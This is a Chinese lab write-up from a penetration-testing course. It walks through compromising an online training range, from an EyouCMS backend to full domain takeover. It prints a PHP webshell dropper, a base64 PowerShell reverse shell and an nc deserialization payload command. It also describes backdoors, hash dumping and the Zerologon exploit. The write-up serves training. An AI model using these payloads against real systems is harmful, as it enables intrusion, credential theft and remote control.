暗月渗透测试十月份考核文章 第二篇
2022-10-14 14:15:52 Author: moonsec(查看原文) 阅读量:31 收藏

暗月渗透测试十月份考核文章 第二篇

0考核介绍

本次考核最终通过人数七人 达到预期目标

考核内容 

本次考核使用在线靶靶场,主要考核从外网打点到内网域渗透的能力。

  • web:php代码审计 、java反序列化漏洞利用等。

  • 内网:隧道应用、横向渗透、域渗透等 。

难度 中

拓扑图:

1WEB

指纹识别

得知目标为 易优CMS
寻找后台
dirsearch扫描发现后台地址

后台登录绕过
参考链接:https://www.cnblogs.com/Pan3a/p/14880225.html
利用脚本跑出来

替换PHPSESSID进入后台

getshell
后台代码执行漏洞
进入模板管理

进入 pc 文件夹

进入index.htm

执行恶意代码

<?=exec('whoami');

进入首页,右键检查源码

恶意代码执行成功
写入webshell
直接替换即可

<?phpfile_put_contents("./uploads/allimg/moonsec.php",base64_decode("PD9waHAgcGhwaW5mbygpO0BldmFsKCRfUkVRVUVTVFsidnZ2Il0pOz8+"));?>


连接成功

换到线上同理

2内网


cobalt strike powershell上线
web钓鱼—>web投递—>运行

复制粘贴到哥斯拉

成功上线

抓取Hash

hashdump

用somd5 MD5解密,得到密码

metasploit exe上线
metasploit生成exe后门程序

上传 shell.exe 到 C:\Windows\Temp\

cd C:\Windows\Temp\
shell shell.exe 运行

metasploit成功上线

cobalt strike开启socket代理

nmap扫描
kali配置 /etc/proxychains.conf

使用nmap进行端口扫描

扫描结果

Host is up (0.35s latency).Not shown: 991 closed portsPORT      STATE SERVICE      VERSION135/tcp   open  msrpc        Microsoft Windows RPC139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds9999/tcp  open  abyss?49152/tcp open  msrpc        Microsoft Windows RPC49153/tcp open  msrpc        Microsoft Windows RPC49154/tcp open  msrpc        Microsoft Windows RPC49155/tcp open  msrpc        Microsoft Windows RPC49156/tcp open  msrpc        Microsoft Windows RPCMAC Address: 00:0C:29:CA:1F:4B (VMware)Device type: general purposeRunning: Microsoft Windows 7|2012|8.1OS CPE: cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_2012 cpe:/o:microsoft:windows_8.1OS details: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1Uptime guess: 0.073 days (since Tue Oct  4 00:47:51 2022)Network Distance: 1 hopTCP Sequence Prediction: Difficulty=263 (Good luck!)IP ID Sequence Generation: IncrementalService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:| nbstat: NetBIOS name: DATA, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ca:1f:4b (VMware)| Names:| DATA<00> Flags: <unique><active>| VSMOON<00> Flags: <group><active>|_ DATA<20> Flags: <unique><active>| smb-security-mode:| account_used: guest| authentication_level: user| challenge_response: supported|_ message_signing: disabled (dangerous, but default)| smb2-security-mode:| 2.02:|_ Message signing enabled but not required| smb2-time:| date: 2022-10-04 02:33:30|_ start_date: 2022-10-04 00:48:29
TRACEROUTEHOP RTT ADDRESS1 351.31 ms 192.168.22.146
NSE: Script Post-scanning.Initiating NSE at 02:33Completed NSE at 02:33, 0.00s elapsedInitiating NSE at 02:33Completed NSE at 02:33, 0.00s elapsedRead data files from: /usr/bin/../share/nmapOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 244.88 seconds Raw packets sent: 2026 (89.838KB) | Rcvd: 1167 (47.418KB)


发现存在 域 和9999端口
发现web机器桌面存在
QQclient.jar 和 账号.txt
账号内容为:

moonsec 123456
100 123456

使用之前的socket代理
输入账号密码成功登录

猜测应该是个通讯类程序
使用 JD-GUI 反编译 QQclient.jar,发现IP:192.168.22.146,Port:9999

Java反序列化
在Github发现源代码

于是就下载研究了一下
URLDNS
使用URLDNS链测试

dnslog成功回显,此源码存在java反序列化漏洞

cc6

把calc.exe改成powershell反弹shell,powershell需要base64编码
网站:https://shell.nctry.com/
编码后替换calc.exe
编码后内容:

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAuADEANQAyACIALAAxADEAMgA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

socket 9999 反序列化漏洞
在 某位大帅比师傅 的提点下 使用nc发送cc6.bin(记得自己下一个nc)
type cc6.bin | nc -v 192.168.22.146 9999

nc -lvnp

成功接收 反弹shell

端口转发(事前准备1)
由于Data不出网,可是需要下载工具,所以进行端口转发

192.168.22.152 1441 端口转发到 vps 的 7007 端口

vps上用python3开启http服务

cobalt strike 转发上线(事前准备2)

下载后门

下载完成后执行 beacon.exe

成功转发上线
metasploit上线
metasploit 生成 直连exe

metasploit 设置直连

对 Data 信息收集 发现了 第二张 网卡

域内信息收集
cobalt strike 插件

metasploit  meterpreter

CVE-2020-1472
cobalt strike 插件 进行漏洞攻击

CVE-2020-1472 攻击成功
这里有两种方法:
(1)在windows上使用impacket-examples-windows工具包
(2)linux在代理下使用impacket工具包
这里我用了第一种
通过 secretsdump.exe 成功 dump 域管 hash

psexec.exe 横向到域管(也可以在代理下使用 psexec.py )

可以先建立 ipc 连接,然后copy后门到目标机器

metasploit 直连上线 最后一台

4考核结果

5关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏

6关于培训

需要渗透测试培训

扫一扫添加微信咨询

课程内容点击了解

暗月渗透测试课程更新


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653583745&idx=1&sn=b400001221be262f644b823f28a522fc&chksm=811b6fc3b66ce6d5e2a8f7c4eaf0144dd695b1e4a4f2d61cc727bf5c06d9f05a62ae1575c739#rd
如有侵权请联系:admin#unsafe.sh